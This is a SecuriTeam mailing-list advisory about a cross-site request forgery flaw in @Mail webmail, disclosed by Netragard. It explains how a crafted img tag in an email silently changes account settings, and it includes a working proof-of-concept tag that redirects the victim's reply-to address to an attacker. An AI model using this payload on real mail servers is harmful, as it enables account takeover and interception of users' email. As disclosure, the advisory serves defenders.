The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
@Mail WebMail Cross Site Request Forgery
------------------------------------------------------------------------
SUMMARY
" <http://www.atmail.com> @Mail is a feature rich Email Solution,
providing a complete WebMail interface for accessing email-resources via a
web-browser or wireless device."
It is possible to take control of an @Mail webmail email account by
exploiting a Cross Site Request Forgery (XRSF) vulnerability in the @Mail
webmail product.
DETAILS
An attacker can send a specially crafted email to any @Mail webmail user
with a forged "img" tag. This forged tag, if crafted properly, will inject
new settings into the @Mail webmail users account.
Example:
http://server/webmail/util.pl?func=settings&;<forged settings in here>
Netragard has discovered a critical flaw in @Mail webmail that allows an
attacker to change arbitrary settings in a users @Mail webmail account.
This flaw targets the util.pl page that is used to manage a users account
settings.
By default this page uses "HTTP POST" to commit changes. Netragard has
found that it is also possible to commit settings changes using an "HTTP
GET".
@Mail webmail's default configuration is to disable the display of images
for users that are not in the current accounts address book. Users
contained in the address book are considered to be trusted.
@Mail webmail's image loading security feature can be circumvented by
using specially crafted "img" tags embedded in emails sent to @Mail
webmail users. In fact, when an external image is referenced by using the
"img" tag, @Mail webmail automatically retrieves the image and loads the
image as a part of the email.
If the "img" tag is replaced by a specially crafted URL then an attacker
can commit changes to the targeted @Mail webmail email account.
Proof Of Concept:
The below example changes the reply to address of the victim to
attacker@haxor.org.
Similar attacks can be used to change other user settings including the
users password.
<img src=http://victim.com/atmail/webmail/util.pl?func=settings&save=1&;
RealName=&ReplyTo=attacker%40hax0r.org&MboxOrder=id&EmailHeaders=Standard&
FontStyle=Verdana&Language=english&LeaveMsgs=1&Refresh=1200&MsgNum=25&
TimeFormat=%25l%3A%25M+%25p&DateFormat=%25e%2F%25m%2F%25y&TimeZone=
America%2FNew_York&EmailEncoding=UTF8&DisplayImages=2&AutoComplete=
1&Advanced=1&HtmlEditor=1&Signature=&save=Save+Settings&AutoReply=&
PKIenable=1&PGPenable=0&SMIMEtown=&SMIMEstate=&SMIMEcountry=&PGPpassword=
&PGPpasswordconfirm=&LoginType=xul&PrimaryColor=%23EBE9E4&SecondaryColor=%
23F4F4F4&ThirdColor=%23FAFAFA&HeaderColor=%23F5F5F5&HeadColor=%2306082C&
BgColor=%23F9F9F9&TextColor=%2306082C&TextHeadColor=%23303030&LinkColor=%
23000000&VlinkColor=%23000033&OnColor=%23F3F3F3&OffColor=%23FFFFFF&
SelectColor=%23E4EEF8&TopBg=imgs%2Fgraygrad.g>
Vendor Status:
Vendor Notified on 12/18/06.
ADDITIONAL INFORMATION
The information has been provided by Philippe C. Caturegli.
The original article can be found at:
<http://www.netragard.com/pdfs/research/ATMAIL-XRRF-ADVISORY-20061218.txt>
http://www.netragard.com/pdfs/research/ATMAIL-XRRF-ADVISORY-20061218.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
